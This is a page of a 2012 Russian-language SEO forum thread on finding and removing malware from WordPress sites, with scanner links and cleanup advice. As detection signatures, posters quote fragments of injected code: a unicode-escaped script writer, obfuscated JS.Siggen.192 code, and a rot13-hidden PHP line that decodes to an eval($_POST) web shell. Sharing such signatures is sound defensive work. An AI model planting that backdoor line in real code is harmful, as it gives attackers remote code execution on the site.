Вредоносный код в wordpress - Mal/JSIfrLd-A

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Программная часть

16 страниц

« < 3 4 5 6 7 8 9 10 11 12 13 14 15 16 >

Вредоносный код в wordpress - Mal/JSIfrLd-A, Помогите отловить

Опции

Electric Electric 9.3.2012, 7:59; Сообщений: 1532 Поблагодарили: 400 раз Репутация: 57 Просмотр профиля	9.3.2012, 7:59; Ответить: Electric Сообщение #122
CMS help/antivirus Группа: Active User Сообщений: 1532 Регистрация: 27.12.2009 Из: Єдина Україна Поблагодарили: 400 раз Репутация: 57	Сегодня срочно пришлось чистить один сайт, на который ругался AVG. Постоянно обнаруживался Blackhole Exploit Kit Detection (type 1889). Благодоря sitecheck.sucuri.net/scanner был обнаружен левый код в одном из файлов темы. Вылаживаю часть кода: document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020 Что декодируется этим деколдером http://home.comcast.net/~jscheuer1/side/decoder.htm как: document.write("<script Так что проверяйте свои файлы на наличие: \u0073\u0063\u0072\u0069\u0070\u0074 Кстати для проверки сайтов на вирусы есть еще такие сайты: http://www.safeweb.norton.com http://www.avgthreatlabs.com/sitereports/ http://www.virustotal.com (click the “Scan a URL”) Сообщение отредактировал Electric - 8.3.2012, 15:10 -------------------- Чистка от вирусов. Sape. CMS, плагины, моды, темы. НесТ@ндАртнЫе решения. [VK][FB][TW][LJ][G+]

Rxp Rxp 10.3.2012, 12:01; Сообщений: 117 Поблагодарили: 21 раз Репутация: 10 Просмотр профиля	10.3.2012, 12:01; Ответить: Rxp Сообщение #123
Участник Группа: User Сообщений: 117 Регистрация: 9.11.2008 Поблагодарили: 21 раз Репутация: 10	(Electric @ 9.3.2012, 7:59) Сегодня срочно пришлось чистить один сайт, на который ругался AVG. Постоянно обнаруживался Blackhole Exploit Kit Detection (type 1889). Благодоря sitecheck.sucuri.net/scanner был обнаружен левый код в одном из файлов темы. Вылаживаю часть кода: document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020 Что декодируется этим деколдером http://home.comcast.net/~jscheuer1/side/decoder.htm как: document.write("<script Так что проверяйте свои файлы на наличие: \u0073\u0063\u0072\u0069\u0070\u0074 Данные кодировки уже не новы. АКЦИЯ! Для всех у кого есть подозрение на вирусы, проверим ваши сайты на вирусы и шеллы, Вы платите только за результат! Стучите в асю! -------------------- Почистим сайт от вирусов, шеллов и др. -> Топик на серче -> Топик в сапе

rus23kav rus23kav 12.3.2012, 22:00; Сообщений: 492 Поблагодарили: 97 раз Репутация: 21 Просмотр профиля	12.3.2012, 22:00; Ответить: rus23kav Сообщение #124
Бывалый Группа: User Сообщений: 492 Регистрация: 13.7.2011 Поблагодарили: 97 раз Репутация: 21	Зашел на хостинг посмотреть лог сайта, а там куча запросов типа: 202.80.147.185 - - [12/Mar/2012:21:32:34 +0400] "POST /wp-login.php HTTP/1.0" 200 3889 "http://мой сайт.RU/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1" 94.50.164.87 - - [12/Mar/2012:21:32:37 +0400] "GET /favicon.ico HTTP/1.0" 200 16958 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" Это так понимаю кто-то пытается зайти в админку? Запросы /wp-login.php и все с разных ip, перебирают пароли что ли? -------------------- Это еще цветочки

Electric Electric 13.3.2012, 0:42; Сообщений: 1532 Поблагодарили: 400 раз Репутация: 57 Просмотр профиля	13.3.2012, 0:42; Ответить: Electric Сообщение #125
CMS help/antivirus Группа: Active User Сообщений: 1532 Регистрация: 27.12.2009 Из: Єдина Україна Поблагодарили: 400 раз Репутация: 57	(rus23kav @ 12.3.2012, 21:00) Это так понимаю кто-то пытается зайти в админку? Запросы /wp-login.php и все с разных ip, перебирают пароли что ли? Да, возможно пароль уже знают - посмотрите на наличия левого кода в файлах. Возможно пытаются запутать вас. -------------------- Чистка от вирусов. Sape. CMS, плагины, моды, темы. НесТ@ндАртнЫе решения. [VK][FB][TW][LJ][G+] Поблагодарили: (1) mikka

mikka mikka 13.3.2012, 10:53; Сообщений: 242 Поблагодарили: 46 раз Репутация: 7 Просмотр профиля	13.3.2012, 10:53; Ответить: mikka Сообщение #126
Участник Группа: User Сообщений: 242 Регистрация: 8.3.2009 Из: Paris/Nice Поблагодарили: 46 раз Репутация: 7	Из ниоткуда на сайте стали появляться левые ссылки. В индексном файле была найдена пакость, которая добавляла код лишний в index.php и в итоге имели около 700 внешних ссылок на какой то левый ресурс. А также была найдена папка с залитым ГС, которая благополучно была снесена и больше не появлялась. А вот левый код появлялся раз в сутки-двое после удаления. Спасибо большое Электрику за оказанную помощь. Дырок в файлах сайта найдено не было и решено было свалить с Таймвеба. TimeWeb (Таймвеб) - самый дырявый хостинг в мире. И о чудо, никакого левого кода, никаких лишних ссылок. -------------------- день, ночь? все равно. Поблагодарили: (1) Electric

rus23kav rus23kav 13.3.2012, 20:45; Сообщений: 492 Поблагодарили: 97 раз Репутация: 21 Просмотр профиля	13.3.2012, 20:45; Ответить: rus23kav Сообщение #127
Бывалый Группа: User Сообщений: 492 Регистрация: 13.7.2011 Поблагодарили: 97 раз Репутация: 21	Сменил все пароли, кроме от базы, поставил пароль на папку админ, перезалил все файлы движка, темы и плагины - вроде все ок', пока вирусов нет, надеюсь хоть эти меры спасут! -------------------- Это еще цветочки

Electric Electric 13.3.2012, 23:18; Сообщений: 1532 Поблагодарили: 400 раз Репутация: 57 Просмотр профиля	13.3.2012, 23:18; Ответить: Electric Сообщение #128
CMS help/antivirus Группа: Active User Сообщений: 1532 Регистрация: 27.12.2009 Из: Єдина Україна Поблагодарили: 400 раз Репутация: 57	(mikka @ 13.3.2012, 9:53) TimeWeb (Таймвеб) - самый дырявый хостинг в мире. Вот еще про таймвеб: http://forum.searchengines.ru/showthread.php?t=632841 -------------------- Чистка от вирусов. Sape. CMS, плагины, моды, темы. НесТ@ндАртнЫе решения. [VK][FB][TW][LJ][G+]

Electric Electric 16.3.2012, 2:36; Сообщений: 1532 Поблагодарили: 400 раз Репутация: 57 Просмотр профиля	16.3.2012, 2:36; Ответить: Electric Сообщение #129
CMS help/antivirus Группа: Active User Сообщений: 1532 Регистрация: 27.12.2009 Из: Єдина Україна Поблагодарили: 400 раз Репутация: 57	Еще може встречатся такой код: $cmfunc=@create_function('', str_rot13('riny($_CBFG[\'m0\']);'));@$cmfunc(); где str_rot13('riny($_CBFG[\'m0\']); декодируется как eval($_POST['z0']); что по сути есть шелл исполняющий отправленный постом код... -------------------- Чистка от вирусов. Sape. CMS, плагины, моды, темы. НесТ@ндАртнЫе решения. [VK][FB][TW][LJ][G+] Поблагодарили: (1) gromhold

Electric Electric 17.3.2012, 12:35; Сообщений: 1532 Поблагодарили: 400 раз Репутация: 57 Просмотр профиля	17.3.2012, 12:35; Ответить: Electric Сообщение #130
CMS help/antivirus Группа: Active User Сообщений: 1532 Регистрация: 27.12.2009 Из: Єдина Україна Поблагодарили: 400 раз Репутация: 57	Недавно чистил от злобного вируса JS.Siggen.192 сайт на ВП и форум... Более 200 модифицированых копий в разных файлах... Искать нужно что то подобное этому: var p333bb1="";function y19a2a6ef9f(){var l07cb898=String,ub4008a0=Array.prototype.slice.call(arguments).join(""),q4a46a=ub4008a0.substr(1,3)-395,tf192c7ba Так как код постоянно модифицируется - неизменным остаеттся вот это: Array.prototype.slice.call(arguments).join("") Вирус очень геморный... -------------------- Чистка от вирусов. Sape. CMS, плагины, моды, темы. НесТ@ндАртнЫе решения. [VK][FB][TW][LJ][G+]

Electric Electric 21.3.2012, 0:25; Сообщений: 1532 Поблагодарили: 400 раз Репутация: 57 Просмотр профиля	21.3.2012, 0:25; Ответить: Electric Сообщение #131
CMS help/antivirus Группа: Active User Сообщений: 1532 Регистрация: 27.12.2009 Из: Єдина Україна Поблагодарили: 400 раз Репутация: 57	Внимание недавно Яндекс начал ругаться на сайты на которых точно ничего не было... Оказалось что тут може быть замешан Гугл! http://habrahabr.ru/post/140303/ Еще можно сканировать вот этим сайтом: http://wepawet.iseclab.org/index.php http://sitecheck.sucuri.net/scanner - он если находит то точно чтото есть а если не находит - смотрите другими, что упоминал ранее. -------------------- Чистка от вирусов. Sape. CMS, плагины, моды, темы. НесТ@ндАртнЫе решения. [VK][FB][TW][LJ][G+] Поблагодарили: (1) orange

« Предыдущая тема · Программная часть · Следующая тема »

16 страниц

« < 3 4 5 6 7 8 9 10 11 12 13 14 15 16 >

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Нужен кодер, чтобы пофиксить ошибку Wordpress после переноса сайта	0	Alex-777	810	7.4.2024, 18:05 автор: Alex-777
Продам базу сайтов Wordpress в 16 миллионов доменов! Свежая сборка.	17	Boymaster	10862	17.3.2024, 2:53 автор: Boymaster
Перенос сайта на CMS Wordpress	8	freeax	4951	10.3.2024, 14:58 автор: freeax
Как настроить в WordPress для SEO оптимизации	8	rownong27	2471	2.3.2024, 12:59 автор: toplinks
Восстановление сайтов из Вебархива на Wordpress.	39	freeax	32728	14.2.2024, 14:32 автор: freeax

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 18.4.2024, 7:08

Дизайн